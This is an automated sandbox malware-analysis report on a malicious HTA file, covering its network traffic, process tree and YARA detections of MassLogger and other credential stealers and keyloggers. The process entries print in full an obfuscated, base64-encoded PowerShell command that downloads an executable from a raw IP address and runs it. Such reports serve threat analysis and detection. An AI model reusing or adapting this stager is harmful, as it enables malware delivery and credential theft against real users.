Mar 17, 2025 01:19:05.107141018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 17, 2025 01:19:06.769285917 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 00:19:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 17, 2025 01:19:06.906786919 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 17, 2025 01:19:08.237730980 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 00:19:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49683	104.21.112.1	443	416	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-17 00:19:08 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-17 00:19:08 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 00:19:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 22063 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Sun, 16 Mar 2025 18:11:25 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fwd3CdT7fYWMculsqz9yP8aKNA1jgpmrWwFkdbwLBsKbinGr8p9TU4VvvH4ZbbAB3G56xYX0M%2F5yEbre7D%2FjDkl5CcPnzmRHDRA34EfyK203ByeBPnCEjXxhvW9iqIWugaTm%2FvK5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9218512c5d781921-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1665&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1617728&cwnd=148&unsent_bytes=0&cid=1f49394bbfa15aa9&ts=174&x=0"
2025-03-17 00:19:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	20:18:54
Start date:	16/03/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\niceworkingskillgivenmebest.hta"
Imagebase:	0x810000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	20:18:55
Start date:	16/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Imagebase:	0x460000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:18:55
Start date:	16/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:18:55
Start date:	16/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Imagebase:	0xf40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:18:57
Start date:	16/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"
Imagebase:	0x6a0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:18:57
Start date:	16/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP"
Imagebase:	0x390000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:19:02
Start date:	16/03/2025
Path:	C:\Users\user\AppData\Roaming\cossess.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cossess.exe"
Imagebase:	0x510000
File size:	982'016 bytes
MD5 hash:	9A772B3531C6426C3DB9CD09AE1B8576
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Avira Detection: 67%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:19:03
Start date:	16/03/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cossess.exe"
Imagebase:	0x1e0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2104403601.0000000002656000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	20:19:27
Start date:	16/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7c8b00000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report niceworkingskillgivenmebest.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\RES99C2.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14rr3y03.abs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5brum3qz.wdw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqmmzj0a.5en.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hh5pskgt.yv0.psm1

Windows Analysis Report
niceworkingskillgivenmebest.hta